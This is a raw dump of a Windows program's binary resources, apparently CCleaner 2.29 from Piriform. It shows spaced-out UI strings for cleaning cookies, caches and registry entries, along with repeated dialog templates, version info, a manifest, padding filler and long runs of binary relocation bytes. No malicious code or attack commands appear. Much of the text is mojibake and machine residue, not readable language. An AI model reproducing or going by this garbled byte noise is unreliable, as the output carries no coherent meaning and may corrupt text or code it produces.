 S h e l l   D l g              P� � 2     ���               P� 2     ��� B<5=0     ��        � Ȁ     <�     N O D 3 2    � M S   S h e l l   D l g              P� � 2     ���               P� 2     ��� B<5=0     ��        � Ȁ     <�     N O D 3 2    � M S   S h e l l   D l g              P� � 2     ���               P� 2     ��� B<5=0     ��        � Ȁ     <�     N O D 3 2    � M S   S h e l l   D l g              P� � 2     ���               P� 2     ��� B<5=0     ��        � Ȁ     <�     N O D 3 2    � M S   S h e l l   D l g              P� � 2     ���               P� 2     ��� B<5=0     ��        � Ȁ     <�     N O D 3 2    � M S   S h e l l   D l g              P� � 2     ���               P� 2     ��� B<5=0     ��        � Ȁ     <�     N O D 3 2    � M S   S h e l l   D l g              P� � 2     ���               P� 2     ��� B<5=0     ��        � Ȁ     <�     N O D 3 2    � M S   S h e l l   D l g              P� � 2     ���               P� 2     ��� B<5=0     ��        � Ȁ     <�     N O D 3 2    � M S   S h e l l   D l g              P� � 2     ���               P� 2     ��� B<5=0     ��        � Ȁ     <�     N O D 3 2    � M S   S h e l l   D l g              P� � 2     ���               P� 2     ��� B<5=0     ��        � Ȁ     <�     N O D 3 2    � M S   S h e l l   D l g              P� � 2     ���               P� 2     ��� B<5=0     ��        � Ȁ     <�     N O D 3 2    � M S   S h e l l   D l g              P� � 2     ���               P� 2     ��� B<5=0     ��        � Ȁ     <�     N O D 3 2    � M S   S h e l l   D l g              P� � 2     ���               P� 2     ��� B<5=0     ��        � Ȁ     <�     N O D 3 2    � M S   S h e l l   D l g              P� � 2     ���               P� 2     ��� B<5=0     ��        � Ȁ     <�     N O D 3 2    � M S   S h e l l   D l g              P� � 2     ���               P� 2     ��� B<5=0     ��        � Ȁ     <�     N O D 3 2    � M S   S h e l l   D l g              P� � 2     ���               P� 2     ��� B<5=0     ��        � Ȁ     <�     N O D 3 2    � M S   S h e l l   D l g              P� � 2     ���               P� 2     ��� B<5=0     ��        � Ȁ     <�     N O D 3 2    � M S   S h e l l   D l g              P� � 2     ���               P� 2     ��� B<5=0     ��        � Ȁ     <�     N O D 3 2    � M S   S h e l l   D l g              P� � 2     ���               P� 2     ��� B<5=0     ��        � Ȁ     <�     N O D 3 2    � M S   S h e l l   D l g              P� � 2     ���               P� 2     ��� B<5=0     ��        � Ȁ     <�     N O D 3 2    � M S   S h e l l   D l g              P� � 2     ���               P� 2     ��� B<5=0     ��        � Ȁ     <�     N O D 3 2    � M S   S h e l l   D l g              P� � 2     ���               P� 2     ��� B<5=0     ��        � Ȁ     <�     N O D 3 2    � M S   S h e l l   D l g              P� � 2     ���               P� 2     ��� B<5=0     ��        � Ȁ     <�     N O D 3 2    � M S   S h e l l   D l g              P� � 2     ���               P� 2     ��� B<5=0     ��        � Ȁ     <�     N O D 3 2    � M S   S h e l l   D l g              P� � 2     ���               P� 2     ��� B<5=0     ��        � Ȁ     <�     N O D 3 2    � M S   S h e l l   D l g              P� � 2     ���               P� 2     ��� B<5=0     ��        � Ȁ     <�     N O D 3 2    � M S   S h e l l   D l g              P� � 2     ���               P� 2     ��� B<5=0     ��        � Ȁ     <�     N O D 3 2    � M S   S h e l l   D l g              P� � 2     ���               P� 2     ��� B<5=0     ��        � Ȁ     <�     N O D 3 2    � M S   S h e l l   D l g              P� � 2     ���               P� 2     ��� B<5=0     ��        � Ȁ     <�     N O D 3 2    � M S   S h e l l   D l g              P� � 2     ���               P� 2     ��� B<5=0     ��        � Ȁ     <�     N O D 3 2    � M S   S h e l l   D l g              P� � 2     ���               P� 2     ��� B<5=0     ��       P B     �       � T a h o m a          P� � F  �  ��� S w i t c h   V i e w               B !P� �   �  ���             �  P , v B �  ���             %xP7� 7  �  S y s L i s t V i e w 3 2               �P� � >  �  S y s L i s t V i e w 3 2               �H�  � � �  ���                      C C l e a n e r   H o m e p a g e  U n i n s t a l l   C C l e a n e r             PA         1 0 3 3  t e s t 8 C l i c k   h e r e   t o   v i s i t   t h e   C C l e a n e r   w e b s i t e   a t   C C l e a n e r . c o m  C h e c k   f o r   u p d a t e s . . .  O n l i n e   H e l p 2 C l i c k   h e r e   t o   c h e c k   f o r   u p d a t e s   t o   C C l e a n e r   o n l i n e + C l i c k   h e r e   t o   v i e w   t h e   C C l e a n e r   o n l i n e   h e l p n A   n e w   v e r s i o n   o f   C C l e a n e r   ( % 1 )   i s   a v a i l a b l e   f o r   d o w n l o a d . 
 
 W o u l d   y o u   l i k e   t o   v i s i t   t h e   w e b s i t e   t o   d o w n l o a d   i t ? 8 C l i c k   h e r e   t o   v i s i t   t h e   P i r i f o r m   w e b s i t e   a t   P i r i f o r m . c o m  N o   u p d a t e   a v a i l a b l e  E r r o r   c o n t a c t i n g   u p d a t e   s e r v e r   PA                 R u n   C C l e a n e r  O p e n   C C l e a n e r . . .                  S h u t d o w n   a f t e r   C l e a n  R e a d y  C l e a n i n g . . .  A n a l y z i n g . . .              A n a l y z e  C l e a n  S c a n   % 1  R e s t o r e   d e f a u l t   s t a t e 	 C h e c k   a l l  U n c h e c k   a l l            & O p t i o n s  E & x i t  & R u n   C l e a n e r  & S c a n   f o r   I s s u e s  & F i x   s e l e c t e d   i s s u e s . . .  & C a n c e l   S c a n  & T o o l s  & A n a l y z e  & C a n c e l PA   P r o g r e s s                    N o   i s s u e s   w e r e   s e l e c t e d . . D o   y o u   w a n t   t o   b a c k u p   c h a n g e s   t o   t h e   r e g i s t r y ?                 
 S e l e c t   A l l  S e l e c t   A l l   o f   T y p e  D e s e l e c t   A l l  D e s e l e c t   A l l   o f   T y p e  O p e n   i n   R e g E d i t . . .  A d d   t o   E x c l u d e   l i s t          W A R N I N G   a b o u t   % 1 PA                   W i n d o w s  A p p l i c a t i o n s  I s s u e s 	 R e & g i s t r y            & C l e a n e r  & I s s u e s                  C l e a n e r   S e t t i n g s  I s s u e   S c a n n i n g   S e t t i n g s                                C L E A N I N G   C O M P L E T E   -   ( % 1   s e c s )  N o   i s s u e s   w e r e   f o u n d  R e m o v e d   C o o k i e :  R e m o v e d : / I E   H i s t o r y   C l e a n i n g   c a n n o t   b e   r u n   o n   9 5   o r   N T 4 .  M a r k e d   f o r   d e l e t i o n :  E m p t y   R e c y c l e   B i n   ( % 1   f i l e s )   % 2  R e m o v e d   F i l e :  S a v e   t o   t e x t   f i l e . . .  A N A L Y S I S   C O M P L E T E   -   ( % 1   s e c s ) $ % 1   t o   b e   r e m o v e d .   ( A p p r o x i m a t e   s i z e )  % 1   r e m o v e d . E D e t a i l s   o f   f i l e s   t o   b e   d e l e t e d   ( N o t e :   N o   f i l e s   h a v e   b e e n   d e l e t e d   y e t )  D e t a i l s   o f   f i l e s   d e l e t e d  A N A L Y S I S   C A N C E L L E D   -   ( % 1   s e c s )  T h i s   a n a l y s i s   i s   i n c o m p l e t e ) I E   T e m p o r a r y   I n t e r n e t   F i l e s   ( % 1   f i l e s )   % 2 + F i r e f o x / M o z i l l a   c a c h e   c l e a n i n g   w a s   s k i p p e d . 6 F i r e f o x / M o z i l l a   T e m p o r a r y   I n t e r n e t   C a c h e   ( % 1   f i l e s )   % 2 PA) G o o g l e   C h r o m e   c a c h e   c l e a n i n g   w a s   s k i p p e d .  C L E A N I N G   C A N C E L L E D   -   ( % 1   s e c s )  T h i s   c l e a n i n g   i s   i n c o m p l e t e  % 1 %   ( % 2   o f   % 3 )  C a n c e l l i n g . . .  D r i v e                                                    P r o b l e m PA D a t a  R e g i s t r y   K e y                                I s s u e   F i x e d 	 F i x   I s s u e  F i x   A l l   S e l e c t e d   I s s u e s  C l o s e 1 A r e   y o u   s u r e   y o u   w a n t   t o   F i x   a l l   s e l e c t e d   I s s u e s ?                     PA        ! D o   n o t   s h o w   m e   t h i s   m e s s a g e   a g a i n _ T h i s   p r o c e s s   w i l l   p e r m a n e n t l y   d e l e t e   f i l e s   f r o m   y o u r   s y s t e m . 
 
 A r e   y o u   s u r e   y o u   w i s h   t o   p r o c e e d ? r Y o u   m u s t   c l o s e   F i r e f o x / M o z i l l a   t o   a l l o w   t h e   I n t e r n e t   C a c h e   t o   b e   c l e a n e d . 
 
 O t h e r w i s e   t h i s   p r o c e s s   w i l l   b e   s k i p p e d . p Y o u   m u s t   c l o s e   G o o g l e   C h r o m e   t o   a l l o w   t h e   I n t e r n e t   C a c h e   t o   b e   c l e a n e d . 
 
 O t h e r w i s e   t h i s   p r o c e s s   w i l l   b e   s k i p p e d .                                    % 1   b y t e s  % 1   K B  % 1   M B  % 1   G B       PA                         S e a r c h  D e s c r i p t i o n  S i z e  C o u n t  V i e w   s u m m a r y   r e s u l t s  V i e w   d e t a i l e d   r e s u l t s  O p e n   c o n t a i n i n g   f o l d e r  S o r t   b y 
 T r e e   o r d e r 	 F i l e   s i z e 
 F i l e   c o u n t  % 1   f i l e s                 PA                   O p t i o n s             PA                       O K  C a n c e l               2 F a i l e d   t o   s a v e   s e t t i n g s   d u e   t o   a   p e r m i s s i o n s   e r r o r                          A b o u t  S e t t i n g s  C o o k i e s  V e r s i o n   H i s t o r y  I n c l u d e  A d v a n c e d  E x c l u d e  U s e r s                         h Y o u   c a n   d o w n l o a d   t h e   l a t e s t   v e r s i o n ,   r e p o r t   b u g s   a n d   s u b m i t   f e a t u r e   r e q u e s t s   a t   t h e   f o l l o w i n g   w e b s i t e   : )  C o m m a n d - l i n e   p a r a m e t e r s : F / A U T O   -   R u n s   t h e   c l e a n e r   u p o n   l o a d i n g   a n d   t h e n   c l o s e s   t h e   a p p l i c a t i o n . I / L O G   -   E n a b l e s   l o g g i n g   u n d e r   i s s u e   s c a n n i n g .   ( F o r   d e b u g g i n g   i s s u e s   o n l y . ) D / A U T O   / S H U T D O W N   -   R u n s   t h e   c l e a n e r   a n d   t h e n   s h u t s   d o w n   t h e   c o m p u t e r . ' E n g l i s h   v e r s i o n   t r a n s l a t e d   b y   P i r i f o r m .                              C l o s e   p r o g r a m   a f t e r   c l e a n i n g % R u n   C C l e a n e r   w h e n   t h e   c o m p u t e r   s t a r t s 5 A d d   " R u n   C C l e a n e r "   o p t i o n   t o   R e c y c l e   B i n   c o n t e x t   m e n u 9 A d d   " O p e n   C C l e a n e r . . . "   o p t i o n   t o   R e c y c l e   B i n   c o n t e x t   m e n u = O n l y   d e l e t e   f i l e s   i n   W i n d o w s   T e m p   f o l d e r s   o l d e r   t h a n   2 4   h o u r s  H i d e   w a r n i n g   m e s s a g e s  L a n g u a g e PA% S h o w   p r o m p t   t o   b a c k u p   r e g i s t r y   i s s u e s + A u t o m a t i c a l l y   c h e c k   f o r   u p d a t e s   t o   C C l e a n e r 6 S h o w   d e t a i l e d   l o g   o f   I n t e r n e t   E x p l o r e r   t e m p o r a r y   f i l e s  S e c u r e   D e l e t i o n  N o r m a l   f i l e   d e l e t i o n   ( F a s t e r )  S e c u r e   f i l e   d e l e t i o n   ( S l o w e r )  S i m p l e   O v e r w r i t e   ( 1   p a s s )  D O D   5 2 2 0 . 2 2 - M   ( 3   p a s s e s )  N S A   ( 7   p a s s e s ) 4 S h o w   d e t a i l e d   l o g   o f   F i r e f o x / M o z i l l a   t e m p o r a r y   f i l e s  S a v e   a l l   s e t t i n g s   t o   I N I   f i l e   ! S e c u r e   f i l e   d e l e t i o n   e n a b l e d   -   % 1  G u t m a n n   ( 3 5   p a s s e s )  M i n i m i z e   t o   S y s t e m   T r a y  W i p e   F r e e   S p a c e   d r i v e s 0 B a s i c   s e t t i n g s   t o   c o n t r o l   h o w   C C l e a n e r   f u n c t i o n s K A d d i t i o n a l   s e t t i n g s   t o   c o n t r o l   h o w   C C l e a n e r   f u n c t i o n s   ( A d v a n c e d   u s e r s   o n l y )  W i p e   M F T   F r e e   S p a c e  E n a b l e   W i n d o w s   J u m p   L i s t   T a s k s                                                    C o o k i e s   t o   D e l e t e  C o o k i e s   t o   K e e p h S e l e c t   t h e   c o o k i e s   y o u   w a n t   t o   k e e p   ( T h i s   i n c l u d e s   c o o k i e s   f r o m   a l l   I n t e r n e t   b r o w s e r s   a n d   F l a s h   p l u g i n s )  S e a r c h                                 + C u s t o m   f i l e s   t o   d e l e t e   a n d   f o l d e r s   t o   e m p t y 
 A d d   F o l d e r  R e m o v e b W a r n i n g ! 
 T h i s   f o l d e r   w i l l   b e   e m p t i e d   o f   a l l   f i l e s   u p o n   c l e a n i n g . 
 A r e   y o u   s u r e   y o u   w a n t   t o   d o   t h i s ? & Y o u   c a n n o t   s e l e c t   t h e   r o o t   o f   a   d r i v e . " Y o u   c a n n o t   s e l e c t   a   s y s t e m   f o l d e r .  R e m o v e   s e l e c t e d   e n t r i e s ?  C h o o s e   F o l d e r  A d d   F i l e 2 A d d   t h e   d r a g g e d   f i l e s / f o l d e r s   t o   t h e   i n c l u d e   l i s t ?  A d d   R e g i s t r y  F i l e s   a n d   f o l d e r s   t o   e x c l u d e 2 A d d   t h e   d r a g g e d   f i l e s / f o l d e r s   t o   t h e   e x c l u d e   l i s t ?  E d i t  M a n u a l   E d i t PAU S e l e c t   a d d i t i o n a l   f i l e s   a n d   f o l d e r s   y o u   w i s h   C C l e a n e r   t o   r e m o v e   ( A d v a n c e d   u s e r s   o n l y ) k S e l e c t   f i l e s ,   f o l d e r s   a n d   r e g i s t r y   e n t r i e s   y o u   w i s h   C C l e a n e r   t o   e x c l u d e   f r o m   r e m o v i n g   ( A d v a n c e d   u s e r s   o n l y )  A d d                        D r i v e   o r   F o l d e r  F i l e  B r o w s e 	 A l l   F i l e s 
 F i l e   T y p e s  R e c u r s e   S u b f o l d e r s  O K  C a n c e l  F i l e   T y p e s :  O p t i o n s  e . g .   * . t m p ; * . l o g C F o r   s y s t e m   s a f e t y   r e a s o n s   y o u   c a n n o t   s e l e c t   t h i s   s p e c i f i c   l o c a t i o n .                        C & u r r e n t   u s e r   o n l y 
 & A l l   u s e r s  & S e l e c t e d   u s e r s  S e l e c t e d   U s e r s  U n s e l e c t e d   U s e r s             PA   T o o l s                   	 U n i n s t a l l    S t a r t u p  S y s t e m   R e s t o r e   PA       C l o s e  R u n   U n i n s t a l l e r  R e n a m e   E n t r y  D e l e t e   E n t r y  S e a r c h                                P r o g r a m s   t o   R e m o v e  I n s t a l l   D a t e 	 P u b l i s h e r  S i z e  V e r s i o n                   7 T h i s   w i l l   r e m o v e   t h e   u n i n s t a l l   e n t r y   f r o m   t h e   r e g i s t r y . & I t   w i l l   n o t   u n i n s t a l l   t h e   a p p l i c a t i o n . ! A r e   y o u   s u r e   y o u   w i s h   t o   p r o c e e d ?  R e n a m e   e n t r y  C a n n o t   d e l e t e   M S I   i n s t a l l e r . , A l l   s e l e c t e d   r e s t o r e   p o i n t s   w i l l   b e   r e m o v e d . D S e l e c t   a   p r o g r a m   f r o m   t h e   l i s t   y o u   w a n t   t o   r e m o v e   f r o m   y o u r   c o m p u t e r                            K e y  P r o g r a m  F i l e 7 T h e s e   p r o g r a m s   a r e   s e t   t o   r u n   w h e n   y o u r   c o m p u t e r   s t a r t s  D e l e t e Y T h i s   w i l l   p e r m a n e n t l y   r e m o v e   s e l e c t e d   s t a r t u p   e n t r i e s . 
 
 A r e   y o u   s u r e   y o u   w a n t   t o   d o   t h i s ?  E n a b l e  D i s a b l e & F a i l e d   t o   e n a b l e / d i s a b l e   s t a r t u p   i t e m :  E n a b l e d  Y e s  N o                       PA                           D e s c r i p t i o n  D a t e  T i m e PA S t a t u s  R e m o v e  D a t e   a n d   T i m e T M a n a g e   a l l   y o u r   S y s t e m   R e s t o r e   p o i n t s   ( T h e   l a t e s t   o n e   i s   d i s a b l e d   f o r   s y s t e m   s a f e t y )                         PA                   I n t e r n e t   E x p l o r e r  W i n d o w s   E x p l o r e r  S y s t e m  A d v a n c e d       PA                           A p p l i c a t i o n s  I n t e r n e t 
 M u l t i m e d i a 	 U t i l i t i e s  W i n d o w s  F i r e f o x / M o z i l l a  O p e r a  S a f a r i                                                  T e m p o r a r y   I n t e r n e t   F i l e s  C o o k i e s  H i s t o r y  R e c e n t l y   T y p e d   U R L s  I n d e x . d a t   f i l e s  A u t o c o m p l e t e   F o r m   H i s t o r y    L a s t   D o w n l o a d   L o c a t i o n                       PA   R e c e n t   D o c u m e n t s  R u n   ( i n   S t a r t   M e n u )  S e a r c h   A u t o c o m p l e t e  O t h e r   E x p l o r e r   M R U s  M e n u   O r d e r   C a c h e  T r a y   N o t i f i c a t i o n s   C a c h e  W i n d o w   S i z e / L o c a t i o n   C a c h e  U s e r   A s s i s t   H i s t o r y  C u s t o m   F i l e s   a n d   F o l d e r s  H o t f i x   U n i n s t a l l e r s  T h u m b n a i l   C a c h e  W i p e   F r e e   S p a c e  T a s k b a r   J u m p   L i s t s  W i p e   M F T   F r e e   S p a c e              E m p t y   R e c y c l e   B i n  T e m p o r a r y   F i l e s  M e m o r y   D u m p s  C h k d s k   F i l e   F r a g m e n t s  W i n d o w s   L o g   F i l e s  I I S   L o g   F i l e s  O l d   P r e f e t c h   d a t a 	 C l i p b o a r d  W i n d o w s   E r r o r   R e p o r t i n g 	 D N S   C a c h e   PA                   I n t e r n e t   C a c h e  I n t e r n e t   H i s t o r y  D o w n l o a d   H i s t o r y  S a v e d   F o r m   I n f o r m a t i o n  C o m p a c t   D a t a b a s e s     PA  9 T h i s   w i l l   t a k e   e f f e c t   n e x t   t i m e   t h e   c o m p u t e r   i s   r e b o o t e d . < Y o u   w i l l   l o s e   a n y   s a v e d   p a s s w o r d s   i f   y o u   s e l e c t   t h i s   o p t i o n . c Y o u r   s t a r t   m e n u   w i l l   b e   r e s e t ,   n o   i t e m s   w i l l   b e   r e m o v e d ,   a l t h o u g h   a n y   c u s t o m   o r d e r i n g   w i l l   b e   l o s t . N S y s t e m   t r a y   c a c h e   w i l l   b e   r e s e t ,   y o u   n e e d   t o   r e s t a r t   t h e   e x p l o r e r . e x e   p r o c e s s . F T h i s   w i l l   r e s e t   a n y   s a v e d   W i n d o w s   E x p l o r e r   l o c a t i o n   a n d   v i e w   s e t t i n g s . C T h i s   w i l l   c l e a r   t h e   m o s t   r e c e n t l y   u s e d   p r o g r a m s   l i s t   o n   s t a r t   m e n u . � W i p i n g   F r e e   S p a c e   w i l l   s i g n i f i c a n t l y   i n c r e a s e   t h e   a m o u n t   o f   t i m e   t h e   c l e a n i n g   t a k e s .   W e   r e c o m m e n d   y o u   l e a v e   t h i s   d i s a b l e d   f o r   n o r m a l   u s a g e .                                            R e g i s t r y   I n t e g r i t y  F i l e   I n t e g r i t y      M i s s i n g   S h a r e d   D L L s  U n u s e d   F i l e   E x t e n s i o n s  A c t i v e X   a n d   C l a s s   I s s u e s  A p p l i c a t i o n s  F o n t s  A p p l i c a t i o n   P a t h s 
 H e l p   F i l e s 	 I n s t a l l e r  O b s o l e t e   S o f t w a r e  R u n   A t   S t a r t u p  S t a r t   M e n u   O r d e r i n g  S t a r t   M e n u   S h o r t c u t s  D e s k t o p   S h o r t c u t s 	 M U I   C a c h e  T y p e   L i b r a r i e s            M i s s i n g   S h a r e d   D L L  U n u s e d   F i l e   E x t e n s i o n  A c t i v e X / C O M   I s s u e  O p e n   w i t h   A p p l i c a t i o n   I s s u e 
 F o n t   I s s u e  A p p l i c a t i o n   P a t h s   I s s u e  H e l p   F i l e   I s s u e  I n s t a l l e r   R e f e r e n c e   I s s u e  U n i n s t a l l e r   R e f e r e n c e   I s s u e  I n v a l i d   D e f a u l t   I c o n  O b s o l e t e   s o f t w a r e   k e y  O l d   S t a r t   M e n u   k e y  M i s s i n g   S t a r t u p   S o f t w a r e  I n v a l i d   o r   e m p t y   f i l e   c l a s s  U n k n o w n   I s s u e  M i s s i n g   S h o r t c u t   r e f e r e n c e  M i s s i n g   M U I   R e f e r e n c e  M i s s i n g   T y p e L i b   R e f e r e n c e                                     u T h e   f i l e   % 1   i s   r e f e r e n c e d   a s   a   S h a r e d   D L L   a n d   d o e s n ' t   e x i s t .   T h e s e   a r e   o f t e n   l e f t   b e h i n d   a f t e r   u n i n s t a l l i n g   s o f t w a r e . x T h e   f i l e   e x t e n s i o n   % 1   r e f e r e n c e s   a n   i n v a l i d   p r o g r a m   i d e n t i f i e r .   T h e s e   a r e   o f t e n   l e f t   b e h i n d   a f t e r   u n i n s t a l l i n g   s o f t w a r e . j T h e   C O M   c o m p o n e n t   % 1   r e f e r e n c e s   a n   i n v a l i d   C L S I D .   T h e s e   a r e   o f t e n   l e f t   b e h i n d   a f t e r   u n i n s t a l l i n g   s o f t w a r e . { T h e   A p p l i c a t i o n   r e f e r e n c e d   a t :   % 1   c o u l d   n o t   b e   l o c a t e d .   T h e s e   r e f e r e n c e s   a r e   o f t e n   l e f t   b e h i n d   a f t e r   u n i n s t a l l i n g   s o f t w a r e . c T h e   F o n t   % 1   c o u l d   n o t   b e   f o u n d .   T h e s e   r e f e r e n c e s   a r e   o f t e n   l e f t   b e h i n d   a f t e r   u n i n s t a l l i n g   s o f t w a r e . { T h e   A p p l i c a t i o n   r e f e r e n c e d   a t :   % 1   c o u l d   n o t   b e   l o c a t e d .   T h e s e   r e f e r e n c e s   a r e   o f t e n   l e f t   b e h i n d   a f t e r   u n i n s t a l l i n g   s o f t w a r e . y T h e   H e l p   F i l e   r e f e r e n c e d   a t :   % 1   c o u l d   n o t   b e   l o c a t e d .   T h e s e   r e f e r e n c e s   a r e   o f t e n   l e f t   b e h i n d   a f t e r   u n i n s t a l l i n g   s o f t w a r e . PA� T h e   i n s t a l l e r   f i l e   o r   d i r e c t o r y   r e f e r e n c e d   a t :   % 1   c o u l d   n o t   b e   l o c a t e d .   T h e s e   r e f e r e n c e s   a r e   o f t e n   l e f t   b e h i n d   a f t e r   u n i n s t a l l i n g   s o f t w a r e . � T h e   u n i n s t a l l e r   f i l e   o r   d i r e c t o r y   r e f e r e n c e d   a t :   % 1   c o u l d   n o t   b e   l o c a t e d .   T h e s e   r e f e r e n c e s   a r e   o f t e n   l e f t   b e h i n d   a f t e r   u n i n s t a l l i n g   s o f t w a r e . { T h e   U n i n s t a l l e r   r e f e r e n c e d   b y :   % 1   c o u l d   n o t   b e   l o c a t e d .   T h e s e   r e f e r e n c e s   a r e   o f t e n   l e f t   b e h i n d   a f t e r   u n i n s t a l l i n g   s o f t w a r e . 0 T h e   i c o n   r e f e r e n c e d   b y :   % 1   c o u l d   n o t   b e   l o c a t e d . � T h e   s o f t w a r e   k e y :   % 1   d o e s   n o t   c o n t a i n   a n y   i n f o r m a t i o n   s o   c a n   b e   r e m o v e d .   T h e s e   r e f e r e n c e s   a r e   o f t e n   l e f t   b e h i n d   a f t e r   u n i n s t a l l i n g   s o f t w a r e . � T h e   S t a r t   M e n u   f o l d e r   r e f e r e n c e d   b y :   % 1   c o u l d   n o t   b e   l o c a t e d .   T h e s e   r e f e r e n c e s   a r e   o f t e n   l e f t   b e h i n d   a f t e r   u n i n s t a l l i n g   s o f t w a r e . | T h e   s t a r t u p   f i l e   r e f e r e n c e d   a t :   % 1   c o u l d   n o t   b e   l o c a t e d .   T h e s e   r e f e r e n c e s   a r e   o f t e n   l e f t   b e h i n d   a f t e r   u n i n s t a l l i n g   s o f t w a r e . � T h e   k e y   % 1   d o e s   n o t   c o n t a i n   a n y   i n f o r m a t i o n   s o   c a n   b e   r e m o v e d .   T h e s e   r e f e r e n c e s   a r e   o f t e n   l e f t   b e h i n d   a f t e r   u n i n s t a l l i n g   s o f t w a r e . 8 A   f i l e   r e f e r e n c e d   b y   a   s h o r t c u t   d o e s   n o t   e x i s t .   F i l e :   % 1 t T h e   f i l e   r e f e r e n c e d   a t :   % 1   c o u l d   n o t   b e   l o c a t e d .   T h e s e   r e f e r e n c e s   a r e   o f t e n   l e f t   b e h i n d   a f t e r   u n i n s t a l l i n g   s o f t w a r e . w T h e   T y p e L i b   r e f e r e n c e d   a t :   % 1   c o u l d   n o t   b e   l o c a t e d .   T h e s e   r e f e r e n c e s   a r e   o f t e n   l e f t   b e h i n d   a f t e r   u n i n s t a l l i n g   s o f t w a r e .           PA                          $ S o l u t i o n :   D e l e t e   t h e   r e g i s t r y   v a l u e . " S o l u t i o n :   D e l e t e   t h e   r e g i s t r y   k e y . . S o l u t i o n :   D e l e t e   t h e   D e f a u l t I c o n   r e g i s t r y   k e y . # S o l u t i o n :   D e l e t e   t h e   s h o r t c u t   f i l e .                               PA	 N  �  	 O �  	 S �  	 P �  	 Z +�  	 X #�  	 C "�  	 V %�    +�   . #�  	 - "�   - %�   u P�  � u Q�            �       h          �   00     �%          �        h   PA         h            h            h  	          h  
          h   4   V S _ V E R S I O N _ I N F O     ���     W    W  ?                         v   S t r i n g F i l e I n f o   R   0 4 0 9 0 4 b 0   * 	  C o m m e n t s   C C l e a n e r     :   C o m p a n y N a m e     P i r i f o r m   L t d     : 	  F i l e D e s c r i p t i o n     C C l e a n e r     >   F i l e V e r s i o n     2 ,   2 9 ,   0 ,   1 1 1 1     2 	  I n t e r n a l N a m e   c c l e a n e r     f !  L e g a l C o p y r i g h t   C o p y r i g h t   2 0 0 5 - 2 0 1 0   P i r i f o r m   L t d     B   O r i g i n a l F i l e n a m e   c c l e a n e r . e x e     2 	  P r o d u c t N a m e     C C l e a n e r     B   P r o d u c t V e r s i o n   2 ,   2 9 ,   0 ,   1 1 1 1     D    V a r F i l e I n f o     $    T r a n s l a t i o n     	�<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0"><assemblyIdentity name="Piriform.CCleaner" processorArchitecture="x86" version="1.0.0.0" type="win32"></assemblyIdentity><description>Piriform CCleaner</description><dependency><dependentAssembly><assemblyIdentity type="win32" name="Microsoft.Windows.Common-Controls" version="6.0.0.0" processorArchitecture="x86" publicKeyToken="6595b64144ccf1df" language="*"></assemblyIdentity></dependentAssembly></dependency><trustInfo xmlns="urn:schemas-microsoft-com:asm.v3"><security><requestedPrivileges><requestedExecutionLevel level="asInvoker" uiAccess="false"></requestedExecutionLevel></requestedPrivileges></security></trustInfo></assembly>P<?xml version='1.0' encoding='UTF-8' standalone='yes'?>
<assembly xmlns='urn:schemas-microsoft-com:asm.v1' manifestVersion='1.0'>
  <trustInfo xmlns="urn:schemas-microsoft-com:asm.v3">
    <security>
      <requestedPrivileges>
        <requestedExecutionLevel level='asInvoker' uiAccess='false' />
      </requestedPrivileges>
    </security>
  </trustInfo>
</assembly>
PADPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADD   �   00$0.0D0I0S0t0y0�0�0�0�0�0�0�01	114191C1d1i1s1�1�1�1�1�1�1�1�12$2)232T2Y2c2�2�2�2�2�2�2�2�2�233#3D3I3S3t3y3�3�3�3�3�3�3�34	4444>4T4t4�4�4�4�6&7v8�9�;Q?�?�?    �   &0[0�01z1�1�1�1	2,2l2�3�45G5p5�5�5�5/6�6�6�67J7|7�7�7�7�7'8Y8�8�8�8949f9�9�9�9.:`:�:�:�:;?;q;�;�;<9<k<�<�<=8=j=�=�= >2>d>�>�>�>�>�>?G?y?�?�? 0  D   0A0s0�0�0	1;1�1�1�12.2W2�2�2�233"3'3Y3�3�3&9:&:�:�;$=4= @  `   P25�5�5�69&9N9w9�9�9�9O:i:r:�:�:�:;E;w;�;�;<(<Z<�<�<�<"=o=w=�=�=>?>q>�>?3?e?�?�?   P  �   H0z0�0�01B1�1�1232e2�2�23?3q3�3�3+4]4�4�4�4%5�5�5�56K6}6�67J7|7�7�7M88�8�89G9�9�9:C:u:�:�:/;a;�;�;�;@<r<�<�<=:=�=�=�=>J>|>�>�>!?S?�?�? `  8   v12�2�2*3r3�3L4�4�4�4�45x5&6Q6z6�6�67>7�<6>�? p  �   �0�2�4/5�9�93:C:N:]::�:�:�:�:�:�:
;;2;F;Z;n;�;�;�;�;�<�<�<�<R=X=a=f=l=q=v={=�=�=�=�=�=�=�=�=�=�=�=�='>x>�>�>�>�>"?,?1?V?]?{?�?�?�?�?�? �  �    00C0M0S0Y0_0h0�0�0�0�011/1C1W1k11�1�1�1�1�1�1223'3;3O3c3w3�3�3�3�3�3�344+4?4S4g4{4�4�5�5�5663686=6B6�6�6�8�;#<)<:<?<D<N<u<{<�<�<�<�<�<�<=6=;=`=f=�=�=�=�=�=�=�=
>>;>L>X>�>�>�>�>�>	?j?}?�?�?�?�?�?�?   �     	0010E0Y0m0�0�0�0�0�0�0�01!151I1]1q1�1�1�1�1�1�1�12%2C4N4T4Y4_4z44�4�4�4�4�4�4�4�4�4�4�4�5�5�5$6*6A6�6�6�6�6�677,7@7T7h7|7�7�7�7�7�7�78808D8�9�9�9�9�9�9�9�9�9�9�9�9�9::2:7:A:F:j:p:�:�:�:�:;!;5;I;];q;�;<<<<H<\<p<�<�<�<�<�<�<�<=$=8=L=`=t=�=�=�=�=�=�= >>(><>P>d>x>�> �  <  _0d0�0�0�0�0�0�011-1A1&2�2�2�2�2�2�2�2�2�2�2�23}3�3�3�3�3�3�3 4
4444%4,474>4D4I4O4z4�4�4�4�4�4�4�4�4�4�4�4�4�4F5L5R5^5g5p5v5{5�5�5�5�5�5�5�5�5,6z6�6�6�6�6�6�677-7A7U7i7}7�7�7�7�7�7�7	8G9M9j9}9�9�9�9�96:x:}:�:;x;};�;�;�;�;�;�;	<<1<E<Y<m<�<�<�<�<�<�<�<=!=5=I=x>>�>�>�>�>�>�>�>�>????Z?~?�?�?�?�? �  @  0"0.090A0F0U0Z0u01�1�1�1�1�1�12 2%2n2�2�2�2�2�2S3[3j3p3v3�3�3�3�3�3�3�3�3�3�3�3�3
